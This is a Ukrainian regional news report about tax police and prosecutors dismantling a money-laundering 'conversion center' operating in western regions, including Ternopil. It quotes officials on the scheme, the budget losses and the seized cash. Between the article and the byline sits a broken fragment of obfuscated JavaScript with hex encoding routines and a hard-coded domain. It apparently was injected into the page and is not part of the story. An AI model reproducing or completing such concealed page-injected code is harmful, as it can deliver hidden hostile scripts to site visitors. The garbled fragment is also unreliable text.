Ви знаходитесь: Головна / Новини / На території області група осіб займалася «відмиванням» грошей

На території області група осіб займалася «відмиванням» грошей

Прокуратура та податківці припинили діяльність «конвертаційного центру», який займався «відмиванням» коштів. Діяв він одразу в кількох областях Західного регіону, в тому числі і на Тернопільщині. 

До складу групи, яка займалася фінансовими злочинами у «конвертаційному» центрі входило 5 осіб. «Відмивання» грошей вони здійснювали переведенням безготівкових коштів у готівкові. Спершу, укладали договір, із зацікавленими у розкраданні коштів підприємствами, про надання товарів чи послуг. Відповідно за це отримували кошти на рахунки. Однак, товарів чи послуг фактично не надавали і повертали гроші замовникам вже готівкою. Собі ж залишали 10-12%.

ВІТАЛІЙ ДУМА, перший заст. начальника ГУ ДФС в області

«Зазначена схема дозволяла підприємствам реального сектору економіки отримувати не обліковані готівкові кошти, створювала умови для безпідставного завищення валових витрат та податкового кредиту з ПДВ. Шляхом організації проведення безтоварних операцій. Впродовж 2015 та з початку 2016 років учасниками «конвертаційного» центру переведено у готівку більше 40 млн. грн. Втрати бюджету перевищують 5 млн. грн.»

Користувалися послугами злочинної групи і державні структури нашої області та кількох сусідніх. Що ж до учасників «конвертаційного» центру, то в результатів перевірок у них знайшли та вилучили чимало коштів та банківських карток.

ПЕТРО ЦИМБАЛЮК, заст. начальника слідчого управління фінансових розслідувань ГУ ДФС в області

«Було виявлено документи бухгалтерського та податкового обліку, чекові книжки, банківські карточки, засоби зв’язку, комп’ютерну техніку фіктивних суб’єктів підприємницької діяльності, а також готівкові кошти в доларах, 76 тис. доларів, в євро – 1700 євро, 261 тис. грн. на загальну суму понад 2,2 млн грн».

Наразі, ще триває досудове розслідування.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "intb.te.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top